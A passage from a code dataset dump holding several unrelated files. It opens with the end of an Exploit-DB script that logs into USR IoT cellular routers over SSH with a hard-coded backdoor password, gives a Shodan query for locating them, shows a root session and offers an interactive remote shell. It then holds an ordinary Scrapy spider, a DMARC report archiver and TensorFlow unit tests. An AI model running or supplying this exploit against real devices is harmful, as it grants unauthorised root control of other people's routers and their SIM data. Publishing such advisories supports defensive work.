The 'usr' account with password 'www.usr.cn' has the highest\n# privileges on the device. The password is also the default WLAN password.\n# Shodan Dork: title:\"usr-*\" // 4,648 ed ao 15042022\n#\n# -------------------------------------------------------------------------\n# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14\n#\n# --Got rewt!\n# # id;id root;pwd\n# uid=0(usr) gid=0(usr)\n# uid=2(root) gid=2(root) groups=2(root)\n# /root\n# # crontab -l\n# */2 * * * * /etc/ltedial\n# */20 * * * * /etc/init.d/Net_4G_Check.sh\n# */15 * * * * /etc/test_log.sh\n# */120 * * * * /etc/pddns/pddns_start.sh start &\n# 44 4 * * * /etc/init.d/sysreboot.sh &\n# */5 * * * * ps | grep \"/usr/sbin/ntpd\" && /etc/init.d/sysntpd stop;\n# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;\n# cat /tmp/usrlte_info\n# Local time is Fri Apr 15 05:38:56 2022\n# (loop)\n# IMEI Number:8*************1\n# Operator information:********Telecom\n# signal intensity:normal(20)\n#\n# Software version number:E*****************G\n# SIM Card CIMI number:4*************7\n# SIM Card number:8******************6\n# Short message service center number:\"+8**********1\"\n# system information:4G Mode\n# PDP protocol:\"IPV4V6\"\n# CREG:register\n# Check ME password:READY\n# base station information:\"4**D\",\"7*****B\"\n# cat /tmp/usrlte_info_imsi\n# 4*************7\n# # exit\n#\n# lqwrm@metalgear:~$\n# -------------------------------------------------------------------------\n#\n# Tested on: GNU/Linux 3.10.14 (mips)\n# OpenWrt/Linaro GCC 4.8-2014.04\n# Ralink SoC MT7628 PCIe RC mode\n# BusyBox v1.22.1\n# uhttpd\n# Lua\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2022-5705\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php\n#\n#\n# 10.04.2022\n#\n\n\nimport paramiko as bah\nimport sys as baaaaaah\n\nbnr='''\n ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄\n █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██\n █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪\n ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·\n▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄\n▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·\n▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄\n██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌\n·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀\n ▀▄ █·▪ ▪ •██\n ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪\n ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·\n ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·\n ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. 
▐█ ▀.\n ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄\n ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█\n ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀\n'''\nprint(bnr)\n\nif len(baaaaaah.argv)<2:\n print('--Gief me an IP.')\n exit(0)\n\nadrs=baaaaaah.argv[1]\nunme='usr'\npwrd='www.usr.cn'\n\nrsh=bah.SSHClient()\nrsh.set_missing_host_key_policy(bah.AutoAddPolicy())\ntry:\n rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.\n print('--Got rewt!')\nexcept:\n print('--Backdoor removed.')\n exit(-1)\n\nwhile True:\n cmnd=input('# ')\n if cmnd=='exit':\n rsh.exec_command('exit')\n break\n stdin,stdout,stderr = rsh.exec_command(cmnd)\n print(stdout.read().decode().strip())\n\nrsh.close()","repo_name":"Doctype02/exploitdb","sub_path":"exploits/hardware/remote/50894.py","file_name":"50894.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"15986840200","text":"# -*- coding: utf-8 -*-\n\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom regeant.models import RegeantItem, Producer, Brand\nfrom .utils import HelperMixin\n\n\nclass ApplichemSpider(CrawlSpider, HelperMixin):\n name = 'applichem'\n allowed_domains = ['www.applichemus.com']\n start_urls = ['https://www.applichemus.com/products.php']\n\n rules = (\n Rule(SgmlLinkExtractor(\n allow=(r'/products.php', r'/products.php\\?page=\\d+')), follow=True),\n Rule(SgmlLinkExtractor(\n allow=(r'/[\\w-]+\\.html$',)), callback='parse_item'))\n\n def __init__(self):\n self.producer = Producer.objects.get(name='Applichem')\n self.brand = Brand.objects.get(name='Applichem')\n CrawlSpider.__init__(self)\n\n def parse_item(self, response):\n hxs = HtmlXPathSelector(response)\n i = RegeantItem()\n i['product_name'] = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract() else \"\"\n i['product_english_name'] = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract() else \"\"\n product_no = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/h1/span/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/h1/span/text()').extract() else \"\"\n i['product_no'] = product_no.replace(u\"Item#: \", u\"\")\n i['producer'] = self.producer\n i['brand'] = self.brand\n i['url_path'] = response.url\n return i\n","repo_name":"fanshaorui/phdgogo","sub_path":"regeant/spiders/applichem.py","file_name":"applichem.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14593255947","text":"#!/usr/bin/env python3\n\nimport builtins\nimport json\nimport os,re,sqlite3,sys\nimport yaml\n\nfrom datetime import datetime\n\n\n### Custom includes\n\nfrom include import db\nfrom include import decompress\nfrom include import function\nfrom include import imap\nfrom include import xmlparse\n\n\n### Config\n\nconfig = \"/etc/dmarchiver.conf\"\n\ntry:\n\tfh = open(config, 'r')\nexcept FileNotFoundError:\n\ttry:\n\t\tconfig = 
os.path.dirname(os.path.realpath(__file__)) + \"/dmarchiver.conf\"\n\t\tfh = open(config, 'r')\n\texcept FileNotFoundError:\n\t\tprint(\"No Config file found, Aborting\")\n\t\tsys.exit(1)\n\t\n\ntry:\n\twith open(config, 'r') as ymlfile:\n\t\tcfg = yaml.safe_load(ymlfile)\n\n\t\timap_host = cfg['imap']['imap_host']\n\t\timap_port = cfg['imap']['imap_port']\n\t\timap_user = cfg['imap']['imap_user']\n\t\timap_pass = cfg['imap']['imap_pass']\n\t\timap_folder = cfg['imap']['imap_folder']\n\t\tdone_folder = cfg['imap']['done_folder']\n\t\tuse_tls = cfg['connection']['use_tls']\n\t\tuse_starttls = cfg['connection']['use_starttls']\n\t\tallowed_content = cfg['content']['allowed']\n\t\tdaemon_mode\t\t= cfg['process']['daemon']\n\t\tdelay_interval = cfg['process']['delay']\n\t\tlogfile\t\t\t= cfg['process']['logfile']\n\t\tsqlitefile\t\t= cfg['process']['sqlitefile']\n\t\ttmpdir\t\t\t= cfg['process']['tmpdir']\n\t\tdebug\t\t\t= cfg['process']['debug']\n\nexcept Exception as e:\n\tprint(\"Error: %s\" % (e))\n\tlog(logfile,\"ERR\", \"Error parsing config file: %s\" % (e))\n\tsys.exit(1)\n\n### make 'logfile' and 'allowed_content', 'tmpdir' variable global to all imported modules\nbuiltins.logfile \t\t\t= logfile\nbuiltins.allowed_content\t= allowed_content\nbuiltins.tmpdir\t\t\t\t= tmpdir\nbuiltins.debug\t\t\t\t= debug\nbuiltins.sqlitefile\t\t\t= sqlitefile\n\n\n#-----------------------------------\n### 'Inline DB schema'\n### (in case DB does not exist ->\n### then create it\n#-----------------------------------\n \nif not(os.path.isfile(sqlitefile)):\n\n\tconn = sqlite3.connect(sqlitefile)\n\tc = conn.cursor()\n\t\n\tc.execute('''CREATE TABLE dmarc_reports (\n ID INT PRIMARY KEY NOT NULL,\n org_name CHAR(50) NOT NULL,\n org_mail CHAR(80) NOT NULL,\n report_id CHAR(50) NOT NULL UNIQUE,\n begin_date INT NOT NULL,\n end_date INT NOT NULL,\n pub_domain CHAR(80) NOT NULL,\n pub_adkim CHAR(2) NOT NULL,\n pub_aspf CHAR(2) NOT NULL,\n pub_p CHAR(20) NOT NULL,\n pub_sp CHAR(20) NOT NULL,\n pub_pct INT NOT NULL,\n pub_fo INT NOT NULL,\n sip CHAR(18) NOT NULL,\n count INT NOT NULL,\n eval_disp CHAR(10) NOT NULL,\n eval_dkim CHAR(10) NOT NULL,\n eval_spf CHAR(10) NOT NULL,\n header_from CHAR(50) NOT NULL,\n auth_dkim_dom CHAR(50) NOT NULL,\n auth_dkim_res CHAR(10) NOT NULL,\n auth_spf_dom CHAR(50) NOT NULL,\n auth_spf_res CHAR(10) NOT NULL\n\t)''')\n\n### check if tmpdir exists\nif not os.path.exists(tmpdir):\n\t\ttry:\n\t\t\tfunction.log(logfile, \"INFO\", \"temp path doesn't exist, trying to create\")\n\t\t\tos.makedirs(tmpdir)\n\t\texcept Exception as e:\n\t\t\tprint(\"Error: %s\" % (e))\n\t\t\tsys.exit(1)\n\n\n### Fetching reports via IMAP\nimap.fetch_report_imap(imap_host, imap_port, imap_user, imap_pass, imap_folder, done_folder, use_starttls, use_tls)\n\n### Parsing reports\n\nfor fn in os.listdir(tmpdir):\n\t\n\tif ( fn.endswith(\".xml\") ):\n\t\tabs_fn = os.path.abspath(os.path.join(tmpdir,fn))\n\t\tcurrent_report = xmlparse.parseXMLfromFile(abs_fn)\n\t\tprint(current_report.submitorg)\n\t\tprint(current_report.submitmail)\n\t\tprint(current_report.repdomain)\n\t\tprint(current_report.repid)\n\t\tprint(current_report.begindate)\n\t\tprint(current_report.enddate)\n\t\tprint(datetime.utcfromtimestamp(int(current_report.begindate)).strftime('%Y-%m-%d %H:%M:%S'))\n\t\tprint(datetime.utcfromtimestamp(int(current_report.enddate)).strftime('%Y-%m-%d %H:%M:%S'))\n\t\t#print(current_report.policy_pub)\n\t\t#print(current_report.identifiers)\n\t\t#print(current_report.auth_results)\n\t\t\t\t\n\t\tdata = 
json.loads(json.dumps(current_report.policy_pub))\n\t\t\n\t\trepdomain\t= data['repdomain']\n\n\t\ttry:\n\t\t\tadkim \t= data['adkim']\n\t\texcept:\n\t\t\tadkim\t= \"N/A\"\n\n\t\ttry:\n\t\t\taspf\t= data['aspf']\n\t\texcept:\n\t\t\taspf\t= \"N/A\"\n\n\t\ttry:\n\t\t\tp\t\t= data['p']\n\t\texcept:\n\t\t\tp\t\t= \"N/A\"\n\t\t\t\n\t\ttry:\n\t\t\tsp\t\t= data['sp']\n\t\texcept:\n\t\t\tsp\t\t= \"N/A\"\n\n\t\ttry:\n\t\t\tpct\t\t= data['pct']\n\t\texcept:\n\t\t\tpct\t\t= \"N/A\"\n\n\t\ttry:\n\t\t\tfo\t\t= data['fo']\n\t\texcept:\n\t\t\tfo\t\t= \"N/A\"\n\n\t\tdata = json.loads(json.dumps(current_report.policy_eval))\n\n\t\tdisposition\t= data['disposition']\n\t\tdkim\t\t= data['dkim']\n\t\tspf\t\t\t= data['spf']\n\t\t\n\t\tdata = json.loads(json.dumps(current_report.identifiers))\n\t\t\n\t\theader_from\t= data['header_from']\n\t\t\n\t\tdata = json.loads(json.dumps(current_report.auth_results))\n\t\t\n\t\ttry:\n\t\t\tauth_dkim_dom\t= data['dkim']['domain']\n\t\texcept:\n\t\t\tauth_dkim_dom\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_dkim_res\t= data['dkim']['result']\n\t\texcept:\n\t\t\tauth_dkim_res\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_spf_dom\t= data['spf']['domain']\n\t\texcept:\n\t\t\tauth_spf_dom\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_spf_res\t= data['spf']['result']\n\t\texcept:\n\t\t\tauth_spf_res\t= \"N/A\"\n\t\t\t\n\t\tconn = db.connect_db(sqlitefile)\n\t\tID = db.get_last_row_id(conn)\n\n\t\tif ( ID == None ):\n\t\t\tID = 1\n\t\telse:\n\t\t\tID = ID[0] + 1\n\t\t\n\t\tinsert_data = (ID, current_report.submitorg, current_report.submitmail, current_report.repid, \n\t\t\t\t\t current_report.begindate, current_report.enddate, repdomain, adkim, aspf, p, sp, pct,\n\t\t\t\t\t fo, current_report.sip, current_report.cnt, disposition, dkim, spf, header_from,\n\t\t\t\t\t auth_dkim_dom, auth_dkim_res, auth_spf_dom, auth_spf_res );\n\t\t\n\t\ttry:\n\t\t\tdb.insert_data(conn, insert_data)\n\t\texcept Exception as e:\n\t\t\tfunction.log(logfile, \"ERR\", str(e)) \n\t\t\n\t\tos.remove(abs_fn)\n","repo_name":"mischmeister/dmarchiver","sub_path":"dmarchiver.py","file_name":"dmarchiver.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39795677810","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport importlib\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gradient_checker\nfrom tensorflow.python.ops import gradients_impl\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops.distributions import util as distribution_util\nimport tensorflow.python.ops.nn_grad # pylint: disable=unused-import\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.platform import tf_logging\n\n\ndef try_import(name): # pylint: disable=invalid-name\n module = None\n try:\n module = importlib.import_module(name)\n except ImportError as e:\n tf_logging.warning(\"Could not import %s: %s\" % (name, str(e)))\n return module\n\n\nspecial = try_import(\"scipy.special\")\n\n\ndef _logit(x):\n x = np.asarray(x)\n return np.log(x) - np.log1p(-x)\n\n\nclass AssertCloseTest(test.TestCase):\n\n def testAssertCloseIntegerDtype(self):\n x = 
array_ops.placeholder(dtypes.int32)\n y = x\n z = array_ops.placeholder(dtypes.int32)\n feed_dict = {x: [1, 5, 10, 15, 20], z: [2, 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with ops.control_dependencies([distribution_util.assert_close(y, x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n def testAssertCloseNonIntegerDtype(self):\n x = array_ops.placeholder(dtypes.float32)\n y = x + 1e-8\n z = array_ops.placeholder(dtypes.float32)\n feed_dict = {x: [1., 5, 10, 15, 20], z: [2., 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with ops.control_dependencies([distribution_util.assert_close(y, x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n def testAssertCloseEpsilon(self):\n x = [0., 5, 10, 15, 20]\n # x != y\n y = [0.1, 5, 10, 15, 20]\n # x = z\n z = [1e-8, 5, 10, 15, 20]\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval()\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval()\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval()\n\n def testAssertIntegerForm(self):\n # This should only be detected as an integer.\n x = array_ops.placeholder(dtypes.float32)\n y = array_ops.placeholder(dtypes.float32)\n # First component isn't less than float32.eps = 1e-7\n z = array_ops.placeholder(dtypes.float32)\n # This shouldn\"t be detected as an integer.\n w = array_ops.placeholder(dtypes.float32)\n feed_dict = {x: [1., 5, 10, 15, 20], y: [1.1, 5, 10, 15, 20],\n z: [1.0001, 5, 10, 15, 20], w: [1e-8, 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_integer_form(x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(y)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(z)]):\n array_ops.identity(z).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(w)]):\n array_ops.identity(w).eval(feed_dict=feed_dict)\n\n\nclass GetLogitsAndProbsTest(test.TestCase):\n\n def testImproperArguments(self):\n with 
self.test_session():\n with self.assertRaises(ValueError):\n distribution_util.get_logits_and_probs(logits=None, probs=None)\n\n with self.assertRaises(ValueError):\n distribution_util.get_logits_and_probs(logits=[0.1], probs=[0.1])\n\n def testLogits(self):\n p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)\n logits = _logit(p)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n logits=logits, validate_args=True)\n\n self.assertAllClose(p, new_p.eval(), rtol=1e-5, atol=0.)\n self.assertAllClose(logits, new_logits.eval(), rtol=1e-5, atol=0.)\n\n def testLogitsMultidimensional(self):\n p = np.array([0.2, 0.3, 0.5], dtype=np.float32)\n logits = np.log(p)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n logits=logits, multidimensional=True, validate_args=True)\n\n self.assertAllClose(new_p.eval(), p)\n self.assertAllClose(new_logits.eval(), logits)\n\n def testProbability(self):\n p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n probs=p, validate_args=True)\n\n self.assertAllClose(_logit(p), new_logits.eval())\n self.assertAllClose(p, new_p.eval())\n\n def testProbabilityMultidimensional(self):\n p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n\n self.assertAllClose(np.log(p), new_logits.eval())\n self.assertAllClose(p, new_p.eval())\n\n def testProbabilityValidateArgs(self):\n p = [0.01, 0.2, 0.5, 0.7, .99]\n # Component less than 0.\n p2 = [-1, 0.2, 0.5, 0.3, .2]\n # Component greater than 1.\n p3 = [2, 0.2, 0.5, 0.3, .2]\n\n with self.test_session():\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, validate_args=True)\n prob.eval()\n\n with self.assertRaisesOpError(\"Condition x >= 0\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\"probs has components greater than 1\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, validate_args=False)\n prob.eval()\n\n def testProbabilityValidateArgsMultidimensional(self):\n p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Component less than 0. Still sums to 1.\n p2 = np.array([[-.3, 0.4, 0.9], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Component greater than 1. 
Does not sum to 1.\n p3 = np.array([[1.3, 0.0, 0.0], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Does not sum to 1.\n p4 = np.array([[1.1, 0.3, 0.4], [0.1, 0.5, 0.4]], dtype=np.float32)\n\n with self.test_session():\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True)\n prob.eval()\n\n with self.assertRaisesOpError(\"Condition x >= 0\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, multidimensional=True, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\n \"(probs has components greater than 1|probs does not sum to 1)\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, multidimensional=True, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\"probs does not sum to 1\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p4, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p4, multidimensional=True, validate_args=False)\n prob.eval()\n\n def testProbsMultidimShape(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n p = array_ops.ones([int(2**11+1)], dtype=np.float16)\n distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n p = array_ops.placeholder(dtype=dtypes.float16)\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n prob.eval(feed_dict={p: np.ones([int(2**11+1)])})\n\n def testLogitsMultidimShape(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n l = array_ops.ones([int(2**11+1)], dtype=np.float16)\n distribution_util.get_logits_and_probs(\n logits=l, multidimensional=True, validate_args=True)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n l = array_ops.placeholder(dtype=dtypes.float16)\n logit, _ = distribution_util.get_logits_and_probs(\n logits=l, multidimensional=True, validate_args=True)\n logit.eval(feed_dict={l: np.ones([int(2**11+1)])})\n\n\nclass EmbedCheckCategoricalEventShapeTest(test.TestCase):\n\n def testTooSmall(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n param = array_ops.ones([1], dtype=np.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n\n with self.assertRaisesOpError(\n \"must have at least 2 events\"):\n param = array_ops.placeholder(dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n checked_param.eval(feed_dict={param: np.ones([1])})\n\n def testTooLarge(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n param = array_ops.ones([int(2**11+1)], dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n param = array_ops.placeholder(dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n checked_param.eval(feed_dict={param: np.ones([int(2**11+1)])})\n\n def testUnsupportedDtype(self):\n with self.test_session():\n with 
self.assertRaises(TypeError):\n param = array_ops.ones([int(2**11+1)], dtype=dtypes.qint16)\n distribution_util.embed_check_categorical_event_shape(param)\n\n\nclass EmbedCheckIntegerCastingClosedTest(test.TestCase):\n\n def testCorrectlyAssertsNonnegative(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements must be non-negative\"):\n x = array_ops.placeholder(dtype=dtypes.float16)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, -1], dtype=np.float16)})\n\n def testCorrectlyAssersIntegerForm(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements must be int16-equivalent.\"):\n x = array_ops.placeholder(dtype=dtypes.float16)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, 1.5], dtype=np.float16)})\n\n def testCorrectlyAssertsLargestPossibleInteger(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements cannot exceed 32767.\"):\n x = array_ops.placeholder(dtype=dtypes.int32)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, 2**15], dtype=np.int32)})\n\n def testCorrectlyAssertsSmallestPossibleInteger(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements cannot be smaller than 0.\"):\n x = array_ops.placeholder(dtype=dtypes.int32)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.uint16, assert_nonnegative=False)\n x_checked.eval(feed_dict={x: np.array([1, -1], dtype=np.int32)})\n\n\nclass LogCombinationsTest(test.TestCase):\n\n def testLogCombinationsBinomial(self):\n n = [2, 5, 12, 15]\n k = [1, 2, 4, 11]\n\n if not special:\n return\n\n log_combs = np.log(special.binom(n, k))\n\n with self.test_session():\n n = np.array(n, dtype=np.float32)\n counts = [[1., 1], [2., 3], [4., 8], [11, 4]]\n log_binom = distribution_util.log_combinations(n, counts)\n self.assertEqual([4], log_binom.get_shape())\n self.assertAllClose(log_combs, log_binom.eval())\n\n def testLogCombinationsShape(self):\n # Shape [2, 2]\n n = [[2, 5], [12, 15]]\n\n with self.test_session():\n n = np.array(n, dtype=np.float32)\n # Shape [2, 2, 4]\n counts = [[[1., 1, 0, 0], [2., 2, 1, 0]], [[4., 4, 1, 3], [10, 1, 1, 4]]]\n log_binom = distribution_util.log_combinations(n, counts)\n self.assertEqual([2, 2], log_binom.get_shape())\n\n\nclass DynamicShapeTest(test.TestCase):\n\n def testSameDynamicShape(self):\n with self.test_session():\n scalar = constant_op.constant(2.0)\n scalar1 = array_ops.placeholder(dtype=dtypes.float32)\n\n vector = [0.3, 0.4, 0.5]\n vector1 = array_ops.placeholder(dtype=dtypes.float32, shape=[None])\n vector2 = array_ops.placeholder(dtype=dtypes.float32, shape=[None])\n\n multidimensional = [[0.3, 0.4], [0.2, 0.6]]\n multidimensional1 = array_ops.placeholder(\n dtype=dtypes.float32, shape=[None, None])\n multidimensional2 = array_ops.placeholder(\n dtype=dtypes.float32, shape=[None, None])\n\n # Scalar\n self.assertTrue(\n distribution_util.same_dynamic_shape(scalar, scalar1).eval({\n scalar1: 2.0\n }))\n\n # Vector\n\n self.assertTrue(\n distribution_util.same_dynamic_shape(vector, vector1).eval({\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertTrue(\n distribution_util.same_dynamic_shape(vector1, vector2).eval({\n vector1: [2.0, 3.0, 4.0],\n vector2: [2.0, 3.5, 6.0]\n }))\n\n # 
Multidimensional\n self.assertTrue(\n distribution_util.same_dynamic_shape(\n multidimensional, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertTrue(\n distribution_util.same_dynamic_shape(\n multidimensional1, multidimensional2).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]],\n multidimensional2: [[1.0, 3.5], [6.3, 2.3]]\n }))\n\n # Scalar, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar, vector1).eval({\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar1, vector1).eval({\n scalar1: 2.0,\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar1, multidimensional1).eval(\n {\n scalar1: 2.0,\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n\n # Vector, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector, vector1).eval({\n vector1: [2.0, 3.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector1, vector2).eval({\n vector1: [2.0, 3.0, 4.0],\n vector2: [6.0]\n }))\n 